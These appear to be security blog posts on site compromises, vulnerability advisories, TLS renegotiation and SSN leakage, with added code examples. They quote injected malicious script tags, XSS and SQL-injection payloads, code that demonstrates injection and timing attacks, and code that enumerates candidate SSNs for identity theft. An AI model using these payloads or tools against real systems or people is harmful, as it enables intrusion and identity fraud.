Recently I decided that I would no longer maintain my subscription to the local newspaper, The News and Observer.  Like many people I find that I get most of my news online these days and didn’t want to continue paying for something I didn’t use.  I decided to look at their web site to see if I could cancel my subscription online.  This is where I discovered that newsandobserver.com uses a terrible authentication mechanism that can lead to the disclosure of personal information and unauthorized changes to paper delivery and other subscription options.

The crux of the problem is that the web site relies on publicly available information to authenticate subscribers.  Below is a screenshot of the subscriber login screen.

As you can see, all that is required to log in to a subscriber account is a phone number and house number.  Both of these pieces of information are easily obtained online for most people.  After authentication, you have access to the subscriber’s account, where you can gain additional information about them.  The most important information that you can get access to is the subscriber’s email address.  This would be useful to scammers, who could set up a fake site that resembles the real newsandobserver.com, send the subscriber an email telling them that they need to update their account information, and then obtain their credit card or other financial account data.  Below is a screenshot of my account home page.

Another thing that you can do within the subscriber section is manipulate delivery options.  For example, you can put stops on delivery or extend your subscription.  This would allow an unauthorized person to put a hold on someone else’s paper delivery or even change the length of their subscription, both of which could have a financial impact on the subscriber.  Below is a screenshot showing the ability to change these options.

Lastly, subscribers are able to change their personal information such as email address and phone number.  There is also a check-box to disable email notification of account changes.  A scammer could use this option to prevent notifications from being sent to the subscriber after he made changes to the account.  By updating the email address and phone number to one of his choosing, he may even be able to use social engineering to obtain credit card information from an N&O customer service representative.  Below is a screenshot of the page that allows a subscriber to change personal information.

Such a weak authentication mechanism is inexcusable for the second largest newspaper in the state of North Carolina.  With over 750,000 print and online readers, there are many opportunities for scammers to use this weakness to obtain subscribers’ personally identifiable information and potentially additional financial information.  It would not be difficult to automate a process for gathering phone numbers and house numbers for prominent people in North Carolina, many of whom are likely to subscribe to the News and Observer, attempt to login as these individuals, and obtain their email addresses.  With such a list in hand, it would be possible to send them fake emails appearing to be from the N&O that could trick them into divulging their credit card numbers.

I have contacted NewsandObserver.com to report this vulnerability to them.  Remediation is not difficult.  There are many types of authentication mechanisms that work well, and OWASP has a great site dedicated to this topic.  I hope that they take advantage of it to correct this issue.


The conversation usually goes something like this:

Me:  “Hey, have you heard about that new phishing attack targeting Bank of America customers?”

Mac User:  “Oh, I’m not worried about that.  I use a Mac.”

Me: “Well you know, just because you use a Mac doesn’t mean you are safe from an attack.”

Mac User: “Ha.  Everyone knows that Macs are waaaay more secure than Windows systems.”

If I had a nickel for every time I have heard a Mac user make some type of statement to this effect, I would not have to buy any more lottery tickets.  There is a widespread belief that Mac OS X is inherently more secure than Windows and that by using a Mac, one is protected from all threats.  Unfortunately, not only is this not true, but it is dangerous as it leads people to not take appropriate precautions to protect their computers and information.

Let’s start with some basic facts.  I performed a search of the NIST national vulnerability database and found the below data regarding Windows and OS X vulnerabilities:

Year   # of OS X Vulns   # of Vista Vulns
2007   152               61
2008   117               61
2009   101               106

These numbers represent the total number of vulnerabilities published for each of the last 3 years for Mac OS X (all versions) and Microsoft Windows Vista (all versions).  It is clear that OS X has had more total vulnerabilities in the last 3 years than Vista has.  Raw counts are a rough measure, since the OS X figures include the many open-source components Apple bundles and patches through its own updates, but the point stands: neither platform is short of exploitable bugs.  These vulnerabilities provide potential avenues of attack for hackers, which can lead to system compromise and data disclosure.

But that is only the tip of the iceberg.  Phishing scams, trojans and other threats that rely on social engineering don’t depend on any vulnerability in software in order to be successful (drive-by downloads are the exception: they exploit the browser and its plugins, which is exactly where the vulnerability counts above matter).  The weakness they exploit is in the user of the computer.  It doesn’t matter whether you use a Mac, a PC, a NeXT, or a Cray.  If you fall victim to one of these types of attacks that relies on social engineering to get users to divulge their credentials or install malware, using a Mac doesn’t offer you any protection at all.

Given the fact that Mac OS X has plenty of vulnerabilities, it might seem surprising that there is not more malware in the wild that exploits these weaknesses.  I believe the answer to this riddle can be found in the relative percentage of Windows to Mac users.  Most studies have found that Apple has between 7% and 12% market penetration, while Microsoft maintains nearly 85% market share.  If you are a hacker hoping to exploit vulnerabilities, it clearly makes more sense to devote your time and resources to the Windows platform, since your odds of success will be much higher.  However, as the percentage of Mac OS X users grows, the number of exploits that target OS X will also grow.  So, Mac users, take note.  Do not be lulled into a false sense of security.  Be sure to follow best practices for protecting your computer and your data in order to minimize the risk of a successful attack.

In October of 2009 the Fox Sports web site was found to have been compromised with an iframe that redirected visitors to a site hosting malicious content.  The affected URL was hxxp://msn.foxsports.com/fantasy/baseball/hotstreak/external and an example of the injected code is below:

<iframe src="hxxp://thingre.com/in.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>

Anyone who accessed this site while the malicious code was active could potentially have had their computer infected with malware.  Fox Sports administrators eventually removed the iframe, but today the same page was infected again.  This time the below two script tags were injected:

<script src=hxxp://akcworld.com/genco/fusion-request-a-password.php ></script><body topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">

and

<script src='hxxp://nt002.cn/E/J.JS'></script>

These same two scripts were also used in the October Fox Sports web site compromise incident.  The akcworld.com and nt002.cn domains are widely known to host malicious content and are frequently used as part of the Gumblar campaign.  At approximately 9:50pm I checked the Fox Sports web site to verify whether the page was still infected.  It was not.  I then checked the page information and saw that it had been modified at 9:39pm EST, just 10 minutes before I checked the site.
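Injected markup of this kind is easy to spot mechanically.  The scanner below is an added example, not something from the Fox Sports incident or from this post: it walks a page with Python's html.parser and reports iframes that are hidden or 1x1, and script or iframe tags whose source is on a host other than the page's own (or an explicit allowlist).  The sample page it runs against is constructed here from the defanged snippets quoted above plus two legitimate same-site tags; the host names are taken as they appear in the snippets.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class InjectedTagScanner(HTMLParser):
    """Collects iframes that are hidden/tiny or point off-site, and script tags
    whose src is on a host other than the page's own (or an allowlisted host)."""

    def __init__(self, page_host, allowed_hosts=()):
        super().__init__()
        self.allowed = {h.lower() for h in allowed_hosts} | {page_host.lower()}
        self.findings = []  # (tag, src, reason)

    @staticmethod
    def _host(url):
        # urlparse accepts the defanged hxxp:// scheme too, so IOC lists can be fed straight in.
        return (urlparse(url.strip()).hostname or "").lower()

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "").strip() for k, v in attrs}
        src = a.get("src", "")
        if tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            tiny = a.get("width") in ("0", "1") and a.get("height") in ("0", "1")
            hidden = "visibility:hidden" in style or "display:none" in style
            if tiny or hidden:
                self.findings.append(("iframe", src, "hidden or 1x1 frame"))
            elif src and self._host(src) not in self.allowed:
                self.findings.append(("iframe", src, "off-site frame"))
        elif tag == "script" and src and self._host(src) not in self.allowed:
            self.findings.append(("script", src, "off-site script"))


def scan_page(html, page_host, allowed_hosts=()):
    """Returns the list of suspicious tags found in the given HTML."""
    scanner = InjectedTagScanner(page_host, allowed_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page: the three injected snippets quoted above, a legitimate
# same-site script, and a legitimate same-site iframe of normal size.
SAMPLE_PAGE = """<html><head>
<script src="hxxp://msn.foxsports.com/js/site.js"></script>
<script src=hxxp://akcworld.com/genco/fusion-request-a-password.php ></script><body topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<script src='hxxp://nt002.cn/E/J.JS'></script>
<iframe src="hxxp://thingre.com/in.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>
<iframe src="hxxp://msn.foxsports.com/widgets/scores" width="300" height="250"></iframe>
</body></html>"""


if __name__ == "__main__":
    for tag, src, reason in scan_page(SAMPLE_PAGE, "msn.foxsports.com"):
        print(f"{tag:6s} {reason:20s} {src}")
```

Run periodically against a saved copy of each important page, a diff of this output against the previous run is a cheap early warning for exactly the reinfection described here; an allowlist of the CDN and analytics hosts the site legitimately uses keeps the noise down.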


The Fox Sports administrators moved very quickly this time to rectify the site compared to the October incident, which took nearly two weeks to address.  However, this situation obviously raises the question of how the Fox Sports web site keeps being compromised.  I can think of several possibilities that would explain how this could occur:
  1. The hackers installed a backdoor that they continue to use for access
  2. The hackers continue to use compromised credentials to the web site
  3. A vulnerability exists in the web site that has not been remediated
  4. Fox Sports administrators restored an older version of the page that included the malicious code from the October hack
We won’t likely learn the root cause of this compromise any time soon, but it is certain that unless Fox Sports takes preventative action, it will probably occur again.

Recently the Wake County Public School System, in Raleigh, North Carolina, sent out about 15,000 post cards to the parents of students.  These post cards contained information for parents on how to indicate their intentions for school attendance in the next school year.  And about one third of these post cards contained something else…the social security number of the student.  My children attend school in Wake County and also received one of these post cards.  Luckily, we were in the two thirds that did not have the social security number displayed on the post card.  Below is a photo of an actual card that was sent out.  The number circled in red was an actual social security number on those cards that were affected by the leak.


As troubling as this mistake was, what is even more troubling is the lack of recourse for affected students and parents.  North Carolina, like most states, has a data breach notification law which I have written about previously.  This law specifically prohibits sending post cards that contain personal information such as social security numbers.  See the relevant section of the law below:

Except as provided in subsections (c) and (d) of this section, no agency of the State or its political subdivisions, or any agent or employee of a government agency, shall do any of the following:

(9) Print an individual’s social security number on any materials that are mailed to the individual, unless state or federal law required that the social security number be on the document to be mailed. A social security number that is permitted to be mailed under this subdivision may not be printed, in whole or in part, on a postcard or other mailer not requiring an envelope, or visible on the envelope or without the envelope having been opened.

Like most state breach notification laws, the North Carolina law requires incidents such as this to be reported and for those affected to be contacted.  To their credit, the Wake County Public School System did disclose the error and has agreed to provide one year of free credit monitoring for affected families.  But they are not required to do so.  According to the statute, “No private right of action may be brought by an individual for a violation of this section unless such individual is injured as a result of the violation.”   Proving injury is next to impossible, as there usually is no way to demonstrate the source of identity theft or credit fraud.  Moreover, these SSNs could be stored for years before being used fraudulently.  Affected students will need to monitor their credit closely for many years to come.  And if they do end up being victimized by this egregious mistake, they have little legal recourse.

North Carolina’s breach notification law is similar to most states’ in that it requires businesses and other organizations to disclose breaches of personally identifiable information (PII).  And as with most other state laws of this type, penalties for violation are not very strong.  North Carolina’s law is one of the few that actually does allow an individual to sue in the event that injury is caused by the breach.  In actuality, though, it is highly unlikely that any business will have to pay for injuries resulting from disclosure of PII.  Congress is currently debating a federal breach notification law that would apply to all U.S. businesses.  This is a step in the right direction and guarantees that any U.S. citizen whose PII has been disclosed will be notified.  But penalties for violation are still weak, and until businesses are faced with financial penalties, disclosures will continue to be a problem.

The following information was recently posted to a well known information security mailing list.

OpenX adserver version 2.8.1 and lower is vulnerable to remote code execution. To be exploited, this vulnerability requires banner / file upload permissions, such as granted to the ‘advertiser’ and ‘administrator’ roles.

This vulnerability is caused by the (insecure) file upload mechanism of affected OpenX versions. These would check magic bytes of an uploaded file to determine its MIME type, and erroneously assume this information to be reliable. Additionally, while the file name of uploaded files is changed, the file extension is not.

As such, it is possible to upload image files with embedded PHP code and a .php file extension. Unless PHP script execution is explicitly prevented for the file upload location (which has not been documented in the OpenX manual so far and is not the result of a default installation), the PHP code will execute as soon as the file is requested over HTTP and handed to the web server’s PHP handler.

To clarify, an attacker exploiting this security issue does require prior access to OpenX, i.e. exploitation is only possible after successful authentication. On the other hand, advertiser access is a rather low permission level and should not allow for system access.

If these bugs were not hidden from OpenX’s bug tracker, you could read up more about issue X-5747 here: https://developer.openx.org/jira/browse/OX/fixforversion/10910

OpenX 2.8.2 has already been released in October to fix this issue and can be downloaded from http://www.openx.org/ad-server/download

Credit goes to Moritz Naumann for disclosing this vulnerability.

Introduction

Late last week it was disclosed by security researchers Marsh Ray and Steve Dispensa that a design flaw in TLS (the IETF standard that succeeded SSL) could allow an attacker to inject data into an encrypted session using a man-in-the-middle (MITM) attack.   The problem occurs during renegotiation of the TLS channel.  A server asking for a client certificate part-way through a connection is the most common reason renegotiation happens, which is why the scenarios below focus on client certs, but any server that accepts renegotiation is exposed.  Their paper documents the vulnerabilities in the TLS protocol as well as how they could be exploited to violate the integrity of the data stream between a web client and server.  Even though the attacker cannot read the encrypted data, it is possible to inject arbitrary data into an authenticated session, and the server will treat it as if it came from the client.  I will discuss the risks associated with this important discovery and outline some potential attack scenarios.

Putting the Risk Into Perspective

  • As mentioned previously, this vulnerability primarily affects sessions in which client certs are in use.  The vast majority of secured TLS sessions today do not involve client certs, which limits the impact of this vulnerability.  For example, if you are shopping online or connecting to your bank over the Internet, it is almost certainly the case that a client cert is not in use.  Where client certs are sometimes used is in enterprise applications such as external access to corporate email; some companies require the use of client certs in this scenario.  TLS sessions between systems that make up a web application (e.g. SOAP calls) also sometimes use client certs for greater security.  However, for most users client-side certs are a non-issue, which limits the scope of this vulnerability.  One caveat: client certs are only the most common reason a server renegotiates.  A server that lets the client initiate renegotiation at any time (the default in common web servers when this was disclosed) can be attacked without any client cert involved, so the real question for a given server is whether renegotiation is enabled at all.
  • Another limiting factor of this vulnerability is the fact that it can only be exploited via a MITM attack.  MITM attacks are fairly difficult to execute successfully, as they require the interception of the network traffic between the client and the server.  While this is not impossible, it certainly requires some additional work.  In many cases, the effort needed just to pull off the MITM attack would lead to greater potential rewards than attacking the TLS connection.  Some examples of MITM techniques include:
  1. Compromising the network of either the client or the server (e.g. ARP poisoning)
  2. Manipulating the DNS server of the client
  3. Taking advantage of an unsecured WIFI network connected to either the client or the server
  4. Using social engineering to compromise either the client or the server
  5. Compromising a proxy server used by either the client or the server
  • The results of an attack against this vulnerability do not allow the attacker to see any encrypted data sent by the client or the server.  It could allow an attacker to inject commands into the session which the server would believe came from the client and would execute.  However, the attacker would not be able to see the results which limits the impact of this vulnerability.  This situation clearly violates the integrity of the session, but the amount of damage that can be done is limited.
  • This vulnerability affects more than just HTTP.  HTTP is the most common protocol to use TLS, but others do as well (e.g. IMAP).  The sheer scope of applications and protocols that rely on it warrants a fix to ensure that developers and end users can be confident in the behavior and security of their applications.
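A model of the splice the researchers describe, as an added example rather than anything from their paper or from this post.  Real TLS is not implemented here; the point is the application layer's view.  Before the fix, a server joined the bytes received before and after a renegotiation into one stream, so an attacker who sends a partial request and then hands the connection over to the victim's handshake gets the victim's request appended to its own.  The second half shows the check from RFC 5746 (the standardised fix, published in February 2010, after this post): a renegotiating client must echo the previous handshake's verify_data, which the tunneled victim cannot do because from its side the handshake is a fresh one.  The request text, host name and verify_data values are constructed.

```python
from hashlib import sha256

# Constructed sample traffic.  The attacker opens its own TLS connection to the
# server, sends a partial request, then tunnels the victim's handshake so the
# victim's bytes arrive on the same connection after a renegotiation.
ATTACKER_PREFIX = (b"GET /account/transfer?to=attacker HTTP/1.1\r\n"
                   b"Host: bank.example\r\n"
                   b"X-Ignore: ")          # unfinished header: the victim's request line lands here
VICTIM_REQUEST = (b"GET /account/balance HTTP/1.1\r\n"
                  b"Host: bank.example\r\n"
                  b"Cookie: session=victim-session-cookie\r\n\r\n")


def parse_first_request(stream):
    """Minimal HTTP/1.1 request-line and header parser (first request only)."""
    head = stream.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def pre_fix_server_view(segments):
    """Before the fix, a server saw application data from both sides of a
    renegotiation as one continuous byte stream with no boundary marker."""
    return parse_first_request(b"".join(segments))


def verify_data(label):
    """Stand-in for the 12-byte verify_data carried in a handshake's Finished message."""
    return sha256(label).digest()[:12]


def renegotiation_accepted(server_prev_verify_data, client_renegotiation_info):
    """RFC 5746: a client that is renegotiating must echo the verify_data of the
    handshake it is renegotiating; an initial handshake sends an empty value.
    The server compares that against its own record of the connection."""
    return client_renegotiation_info == server_prev_verify_data


if __name__ == "__main__":
    method, path, headers = pre_fix_server_view([ATTACKER_PREFIX, VICTIM_REQUEST])
    # The server executes the attacker's request line with the victim's cookie.
    print(method.decode(), path.decode(), headers[b"cookie"].decode())

    attacker_handshake = verify_data(b"attacker<->server handshake")
    # The tunneled victim handshake is, from the victim's side, an initial one, so it
    # carries an empty renegotiation_info and the patched server refuses to renegotiate.
    print("tunneled victim accepted:", renegotiation_accepted(attacker_handshake, b""))
    print("genuine renegotiation accepted:",
          renegotiation_accepted(attacker_handshake, attacker_handshake))
```

The X-Ignore trick is why the attacker does not need to read anything: the victim's request line is swallowed as a header value, while the victim's Cookie header survives intact and authenticates a request the victim never made.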

Summary

The vulnerability in the TLS protocol disclosed on November 4, 2009 is not likely to lead to a great deal of exploitation.  The primary reasons are the difficulty required to successfully launch an attack and the limited nature of the vulnerability and how it can be exploited.  Most attacks today are financially motivated and are conducted by groups that understand how to perform a cost benefit analysis.  I suspect that they will look at this vulnerability and decide that there are easier ways to exploit systems for monetary gain and it will not be worth their time to devote resources to develop exploits for this one.  The pay off is simply not high enough.  In sum, I believe the risk to most individuals and organizations is fairly low.  Fixes are already being rolled out, but given the extent to which TLS is used today, it will likely be many years before all applications and devices have been remediated.  Even still, I will be surprised if we read about any significant compromises in the future that are attributable to this vulnerability.

Sources for Additional Reading

http://www.educatedguesswork.org/2009/11/understanding_the_tls_renegoti.html

http://www.securityfocus.com/bid/36935/info

http://www.ietf.org/mail-archive/web/tls/current/msg03928.html

http://www.links.org/?p=780


During a recent security audit of the DreamPoll 3.1 software by Dreamlevels, I discovered a number of XSS and SQL Injection vulnerabilities in the application.  These vulnerabilities could be exploited to make unauthorized changes to a web site or compromise a client accessing a site that utilizes the application.  Details of the vulnerabilities are as follows:

XSS
————————-
File: index.php
Variable: recordsPerPage
Example: GET /index.php?action=login&sortField=poll_default&sortDesc=1&recordsPerPage=1>”><ScRiPt%20%0d%0a>alert(911)%3B</ScRiPt>

Blind SQL/Xpath Injection
————————-
File: index.php
Variable: sortField
Example: GET /index.php?action=login&sortField=poll_default+and+31337-31337=0&sortDesc=1&recordsPerPage=20

Blind SQL Injection (Timing)
————————-

File: index.php
Variables: sortField, sortDesc, pageNumber
Example: GET /index.php?action=login&sortField=poll_default+and+sleep(3)%23&sortDesc=1&recordsPerPage=20

While not specifically tested, it is likely these vulnerabilities exist in earlier versions of this application as well.  The vendor was notified on 09/28/2009 and a fix was released the same day.  If you are a current user of this software, contact the vendor for the available fix.
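To show what the sortField and recordsPerPage findings above amount to, here is an added example (not code from DreamPoll): a query builder with the same string-concatenation flaw next to an allowlisted version, run against an in-memory SQLite table of constructed poll rows.  SQLite stands in for MySQL, so a Python sleep() is registered under that name, and the MySQL `#` comment from the advisory (`%23`) becomes `--`, which SQLite understands.  The table and column names are assumed.

```python
import sqlite3
import time


def open_demo_db():
    """In-memory stand-in for the application's database (constructed sample rows).
    A Python sleep() is registered so the MySQL-style timing payload has something to call."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("sleep", 1, time.sleep)
    conn.executescript("""
        CREATE TABLE polls(poll_id INTEGER PRIMARY KEY, poll_title TEXT, poll_default INTEGER);
        INSERT INTO polls VALUES (1, 'Best editor', 2), (2, 'Best OS', 3), (3, 'Best browser', 1);
    """)
    return conn


def list_polls_vulnerable(conn, sort_field, sort_desc, records_per_page):
    """Builds the query by string formatting, so sortField and recordsPerPage
    land in the SQL verbatim.  Returns (rows, sql) so the injected SQL is visible."""
    direction = "DESC" if sort_desc == "1" else "ASC"
    sql = "SELECT poll_id FROM polls ORDER BY %s %s LIMIT %s" % (sort_field, direction, records_per_page)
    return [row[0] for row in conn.execute(sql)], sql


SORTABLE_COLUMNS = {"poll_id", "poll_title", "poll_default"}


def list_polls_hardened(conn, sort_field, sort_desc, records_per_page):
    """Identifiers cannot be bound as parameters, so the sort column is checked
    against an allowlist; LIMIT is an integer bound as a parameter, which also
    removes the reflection point the XSS finding relies on."""
    if sort_field not in SORTABLE_COLUMNS:
        raise ValueError("unsupported sortField")
    direction = "DESC" if sort_desc == "1" else "ASC"
    if not records_per_page.isdigit() or not 1 <= int(records_per_page) <= 100:
        raise ValueError("recordsPerPage must be an integer between 1 and 100")
    sql = "SELECT poll_id FROM polls ORDER BY %s %s LIMIT ?" % (sort_field, direction)
    return [row[0] for row in conn.execute(sql, (int(records_per_page),))]


def timed(fn, *args):
    """Run fn and return (result, elapsed seconds); the timing side channel."""
    start = time.perf_counter()
    result = fn(*args)
    return result, time.perf_counter() - start


def rejected(fn, *args):
    """True when the handler refuses the input with a ValueError."""
    try:
        fn(*args)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    conn = open_demo_db()
    print(list_polls_vulnerable(conn, "poll_default and 31337-31337=0", "1", "20"))
    print(timed(list_polls_vulnerable, conn, "poll_default and sleep(0.2)--", "1", "20"))
    print(rejected(list_polls_hardened, conn, "poll_default and sleep(0.2)--", "1", "20"))
```

The timing payload is the important one in practice: sleep() is evaluated once per row while SQLite computes the sort key, so the delay scales with the table and gives an attacker a yes/no oracle without any visible change in the page.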

Websense recently released their report on the State of Internet Security for the first half of 2009.  They have some very interesting findings which I have summarized below.

  • In the first half of 2009, 77 percent of Web sites with malicious code were legitimate sites that have been compromised. This high percentage was maintained over the past six months in part due to widespread attacks including Gumblar, Beladen and Nine Ball which aimed at compromising trusted Web properties with massive injection campaigns.
  • Web 2.0 sites allowing user-generated content are a top target for cybercriminals and spammers. Websense Security Labs found that 95 percent of comments to blogs, chat rooms and message boards are spam or malicious.
  • The “Dirty” Web is getting dirtier: 69 percent of all Web pages with content classified as objectionable (e.g. Sex, Adult Content, Gambling, Drugs) also had at least one malicious link. This is becoming even more pervasive, as 78 percent of new Web pages discovered in the first half of 2009 with objectionable content had at least one malicious link.
  • Websense Security Labs found that 37 percent of malicious Web attacks included data-stealing code, demonstrating that attackers are after essential information and data.
  • The Web continues to be the most popular vector for data-stealing attacks. In the second half of 2008 the Websense Security Labs found that 57 percent of data-stealing attacks are conducted over the Web.
  • The convergence of blended Web and email threats continues to increase. Websense Security Labs reports that 85.6 percent of all unwanted emails in circulation during the first half of 2009 contained links to spam sites or malicious Web sites.
  • In June alone, the total number of emails detected as containing viruses increased 600 percent over the previous month.

This information confirms that the Web is a dangerous place and becoming more so.  The reason is simple… money.  Criminals have figured out that the benefit from online crime is high and the cost is low.  Moreover, the chances of getting caught are slim.  Compare the crime of identity theft or credit card fraud committed via the Internet with a physical crime such as a bank robbery.  The cost of committing a crime on the Internet is low.  One can obtain ready-made software on the Internet that will help you obtain credit card and other personal information with which it is possible to commit fraud.  The risk associated with this crime is very low compared to the expected payoff.   Robbing a bank, however, has very high costs and risks.  One could get shot, or get caught and sent to prison.  And the likely payoff isn’t that great either.  The average amount of money stolen during a bank robbery is less than $5000.  This isn’t much compared with the risks.

Internet crime is a huge business.  To protect yourself, follow best practices for using the Web safely.  Even legitimate and well known web sites can get compromised and be used to commit fraud against you.  And don’t think because you use a Mac that you are immune to these attacks.  You aren’t.  More on that in a future article.


The second Tuesday of the month is always a busy day for IT and security pros.  That, of course, is the day Microsoft releases their regular security updates.  And this month’s list of advisories reminds me how far we have to go before we get an upper hand on the bad guys who exploit vulnerabilities for a living.  Microsoft, like so many other software vendors, continues to release vulnerable software and we continue to apply patches to fix those vulnerabilities.  All the while, systems are exposed and often get compromised due to this game of reactive patch management.

Microsoft released 5 security advisories today to address 8 vulnerabilities:

  • MS09-045 – addresses a vulnerability in Jscript (KB 971961)
  • MS09-046 – addresses a vulnerability in Microsoft Windows (KB 956844)
  • MS09-047 – addresses a vulnerability in Microsoft Windows (KB 973812)
  • MS09-048 – addresses a vulnerability in Microsoft Windows (KB 967723)
  • MS09-049 – addresses a vulnerability in Microsoft Windows (KB 970710)

The first three patches address vulnerabilities that allow a malicious web site to compromise an unpatched machine simply by browsing the web site.  These drive-by exploits are undoubtedly already set up on rogue web servers, compromising vulnerable systems even as I write this.  Microsoft rated MS09-045 and MS09-047 as critical and MS09-046 as important.

The other two, MS09-048 and MS09-049, are more interesting and potentially more problematic.  Both of these vulnerabilities are rated as important by Microsoft, but I would not be surprised if exploits for these two end up doing more damage than the others.  The reason for this is that both of these patches address vulnerabilities in the network stack and do not require any intervention by the end user for exploitation.  This makes them good candidates for exploitation via a worm, which increases the criticality of these advisories.  Microsoft believes these vulnerabilities are most likely to be exploited via a denial of service attack, as it is difficult to reliably achieve remote code execution.  But denial of service attacks can be very damaging, and it is not inconceivable that someone could write an exploit that can smash the stack, resulting in remote code execution.

Microsoft is not alone in releasing regular security patches and expecting us, the end users, to manage the process of performing the updates.  Apple, Adobe, Red Hat, Sun and every other software vendor does the same thing.  While I understand that software development is a complex endeavor, vendors must get better at implementing security testing and vulnerability analysis into their software development life cycle.  But until they do, keep applying those patches.


Two researchers from Carnegie Mellon University recently released a study showing that social security numbers (SSNs) can be predicted with a fairly high degree of accuracy by knowing just a few bits of personal information.  For example, with knowledge of a person’s birth date and town of birth, they were able to predict the SSN of 8.5% of people born between 1989 and 2003 with fewer than 1000 attempts.  The reason that this works is that SSNs are not randomly assigned, but instead are based on a complex yet regular (and thus predictable) pattern.

This research is of more than just academic interest.  It has real implications for identity fraud and how to protect yourself from becoming a victim.  So how could a malicious person or organization use this research to commit identity theft?  Since all one needs to know to be able to predict someone’s SSN is date of birth and hometown, the best place to begin is on a social networking site such as Facebook or Myspace.  Many people freely provide this information not only to their “friends”, but often to everyone.  It is easy to find out when and where just about anyone was born on these types of sites.  And even if you are careful about sharing this information only with friends, many people accept friendship invitations from just about anyone.  If I were targeting someone in particular whose identity I wanted to steal, I would simply try to befriend some of their contacts before sending them a friend request.  This would lend credibility to the friendship request and make them more likely to accept it.  With a little social engineering, it would not be very difficult to determine the necessary personal information for just about anyone.

The next step would be to use the methods described in the research to predict a set of SSNs for the targeted victims.  Once a list of probable SSNs has been generated, it is possible to use online resources, such as instant online credit approval services or the Social Security Administration verification database, to verify correct SSNs.   Once someone has the name, birth date, hometown and SSN of someone, it is then very easy to steal their identity or obtain credit in their name.  All of this could easily be automated to increase the speed and efficiency of obtaining SSNs, making this a legitimate threat to the safety of personal information.  To protect yourself, be very careful about how much information you share on social networking sites and only accept known people into your online networks.
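The pattern the researchers exploited can be made concrete.  The following Python is an added example, not code from the study or from this post: it encodes the issuance order the SSA used for the two-digit group number within an area before randomization in 2011 (odd 01-09, then even 10-98, then even 02-08, then odd 11-99, with serials 0001-9999 inside each group) and enumerates every SSN that lies between two anchor SSNs issued in the same area shortly before and after a target's birth.  The anchors are assumed inputs (the study took them from the public Death Master File); the values below use area 000, which was never issued, so that no real number appears.

```python
def group_issuance_order():
    """Order in which the SSA issued two-digit group numbers within an area
    (pre-2011 scheme): odd 01-09, even 10-98, even 02-08, odd 11-99."""
    return ([f"{g:02d}" for g in range(1, 10, 2)] +
            [f"{g:02d}" for g in range(10, 99, 2)] +
            [f"{g:02d}" for g in range(2, 9, 2)] +
            [f"{g:02d}" for g in range(11, 100, 2)])


GROUP_RANK = {g: i for i, g in enumerate(group_issuance_order())}
SERIALS_PER_GROUP = 9999   # serial 0000 was never issued


def issuance_rank(ssn):
    """Map AAA-GG-SSSS to (area, position in that area's issuance sequence):
    groups in SSA order, serials 0001-9999 within a group."""
    area, group, serial = ssn.split("-")
    if group not in GROUP_RANK or not 1 <= int(serial) <= SERIALS_PER_GROUP:
        raise ValueError("not a validly formed pre-2011 SSN: " + ssn)
    return int(area), GROUP_RANK[group] * SERIALS_PER_GROUP + (int(serial) - 1)


def ssn_at(area, rank):
    """Inverse of issuance_rank for a given area."""
    group = group_issuance_order()[rank // SERIALS_PER_GROUP]
    serial = rank % SERIALS_PER_GROUP + 1
    return f"{area:03d}-{group}-{serial:04d}"


def candidates_between(before, after):
    """Every SSN issued between two anchor SSNs of the same area, in issuance
    order.  If the anchors belong to people born just before and just after the
    target in the same state, the target's SSN is in this list."""
    area_lo, lo = issuance_rank(before)
    area_hi, hi = issuance_rank(after)
    if area_lo != area_hi or hi <= lo:
        raise ValueError("anchors must share an area and be in issuance order")
    return [ssn_at(area_lo, r) for r in range(lo + 1, hi)]


if __name__ == "__main__":
    # Constructed anchors in the never-issued area 000, about 1100 numbers apart.
    cands = candidates_between("000-09-9500", "000-10-0600")
    print(len(cands), cands[0], "...", cands[-1])
```

Note the wrap from group 09 to group 10 in the sample: a naive attacker who assumed groups were issued in numeric order would search 02-08 next and miss every candidate, which is exactly the "complex yet regular" part of the pattern.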
